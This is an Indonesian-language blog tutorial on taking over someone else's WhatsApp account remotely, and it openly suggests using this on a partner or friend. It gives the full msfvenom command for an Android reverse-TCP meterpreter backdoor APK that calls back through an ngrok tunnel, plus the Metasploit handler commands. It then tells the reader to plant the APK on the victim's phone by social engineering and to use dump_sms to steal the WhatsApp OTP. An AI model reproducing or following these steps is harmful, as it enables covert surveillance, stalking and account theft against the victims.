Tutorial Lengkap Cara Sadap WhatsApp (WA) Jarak Jauh Dengan Metasploit Framework

Tutorial Lengkap Cara Sadap WhatsApp (WA) Jarak Jauh Dengan Metasploit Framework - Halo sobat gaptech, sudah sangat lama nih rasanya mimin tidak update artikel huhuhu akhir akhir ini mimin emang lagi sibuk banget sama tugas kuliah. Pada kesempatan kali ini mimin sempetin bikin artikel untuk kalian semua dan mau kasih tutorial tentang cara sadap menyadap WhatsApp (WA) dari jarak jauh dengan Metasploit Framework, tentunya kalian bisa terapin cara ini untuk menyadap WhatsApp pacar, pasangan, dan teman kalian hehe, oiya apa kalian sudah tau apa itu Metasploit Framewok? kalau belum tau silahkan baca artikel Cara Menyadap Smartphone Android Beda Jaringan Dengan Metasploit (PentestBox + Windows) dan Menyadap Smartphone Android Dengan Metasploit  terlebih dahulu.Bagi kalian yang ingin menyadap WhatsApp melalui android, kalian juga bisa menerapkan tutorial ini dengan Termux, cukup install Metasploit dan Ngrok di Termux kalian.Nah kalau kalian sudah mengerti apa itu metasploit sekarang kita lanjut ke tutorialnya, baca sampai habis ya !

Cara Sadap WhatsApp Jarak Jauh Dengan Metasploit Framework

Persiapan Tools 

1. Metasploit

Disini admin menggunakan pentestbox yang didalamnya sudah ada Metasploit.Untuk cara installnya silakan kalian baca artikel Cara menjalankan Tools Pentesting Dengan Mudah Di Windows, Selain menggunakan Pentestbox kalian juga bisa menginsatall Metasploit di Termux
 

2. Ngrok 

Ngrok disini digunakan untuk melakukan port forwarding dengan Hp Target, berikut ini adalah langkah langkah installasi Ngrok

Daftar Akun Ngrok Disini
Download Ngrok

Buka Terminal/Command Prompt, arahkan ke directory ngrok

Copy Authtoken kalian

Ketik "./ngrok authtoken Auttoken_kalian"

Proses Sadap

Siapkan 3 tab console
Ketik "msfconsole" Pada tab pertama

Arahkan pada directory Ngrok, kemudian ketik "ngrok tcp 1337" untuk port bisa kalian ubah tidak harus di set ke 1337

Pada tab ke 3, ketik  "msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=14535 -o backdoor.apk", untuk lhost dan  lport samakan dengan step nomor 2 sedangkan nama backdoor bisa kalian ganti sendiri

Selanjutnya ketik perintah berikut secara berurutan
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost localhost
set lport 1337 (port samakan dengan yang kalian set di step ke 3)
run

Kemudian pastikan bahwa backdoor sudah tertanam di HP target, kalian bisa melakukan dengan teknik soceng(social engineering)

Setelah muncul meterpreter ketik "sysinfo" untuk memastikan apakah sudah benar benar terhubung dengan HP target

Selanjutnya install WhatsApp di HP kalian dan daftarkan Nomor Target

Kemudian WhatsApp akan meminta kode OTP ke nomor target yang kalian daftarkan

Setelah OTP terkirim buka metasploit dan ketik perintah "dump_sms"

Nah pada tahap ini sms dari hp korban sudah ada ditangan kalian, buka dokumen hasil dump tadi letaknya di "C:\PentestBox\bin\metasploit-framework"  dan masukkan kode OTP dari WhatsApp

Jika kalian mengikuti langkah diatas sampai selesai dengan benar sehaursnya kalian sudah mempunyai akses penuh ke WhatsApp target, kalian juga bisa menyambungkan dengan WhatsApp web agar lebih mudah mengaksenya.Nah itu tadi Tutorial cara menyadap WhatsApp Jarak Jauh dengan Metasploit, jangan lupa share artikel ini agar teman kamu tau apa yang kamu tau, okee see you next time byebye^^.

Posting Komentar

0 Komentar